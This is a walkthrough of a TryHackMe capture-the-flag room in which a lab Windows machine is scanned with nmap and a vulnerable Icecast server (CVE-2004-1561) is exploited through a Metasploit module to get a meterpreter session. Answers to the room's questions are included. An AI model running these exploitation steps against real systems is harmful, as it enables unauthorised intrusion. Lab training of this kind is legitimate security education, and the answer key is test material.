Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
🔴 Important : Please rename this VPN file as per your TryHackMe account username
Click on Access Machine --> Click on OpenVPN (How to connect & config VPN)
Scan and enumerate our victim!
Answer the questions below ----------------------------------------------------------------------------------------------------------------------------------------
Deploy the machine! This may take up to three minutes to start.
No answer needed
Launch a scan against our target machine, I recommend using a SYN scan set to scan all ports on the machine. The scan command will be provided as a hint, however, it's recommended to complete the room 'Nmap' prior to this room.
No answer needed
Once the scan completes, we'll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?
3389
Command: (Your Start Machine IP)
sudo nmap -sT -sV -O -Pn 10.10.254.30
What service did nmap identify as running on port 8000? (First word of this service)
Icecast
Exploit 8000/tcp with Below command
sudo nmap -sT -sV -O -Pn -p 8000 10.10.95.145
Output:
What does Nmap identify as the hostname of the machine? (All caps for the answer)
DARK-PC
Open Metasploit:
msfconsole
Search icecast
use exploit/windows/http/icecast_header
options
set rhosts 10.10.95.145
set lhost 10.8.83.18 (VPN IP)
exploit
Type sysinfo after get meterpreter session
meterpreter > sysinfo
Finally get Hostname
Exploit the target vulnerable service to gain a foothold!
Answer the questions below ----------------------------------------------------------------------------------------------------------------------------------------
Now that we've identified some interesting services running on our target machine, let's do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.
execute code overflow
Visit https://www.cvedetails.com & search icecast
Choose Icecast : Security vulnerabilities
What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000
CVE-2004-1561
Now that we've found our vulnerability, let's find our exploit. For this section of the room, we'll use the Metasploit module associated with this exploit. Let's go ahead and start Metasploit using the command msfconsole
No answer needed
After Metasploit has started, let's search for our target exploit using the command 'search icecast'. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in 'RP: Metasploit' which is recommended to be completed prior to this room, although not entirely necessary.
exploit/windows/http/icecast_header
Let's go ahead and select this module for use. Type either the command use icecast or use 0 to select our search result.
No answer needed
Following selecting our module, we now have to check what options we have to set. Run the command show options. What is the only required setting which currently is blank?
rhosts
First let's check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let's set that last option to our target IP. Now that we have everything ready to go, let's run our exploit using the command exploit
No answer needed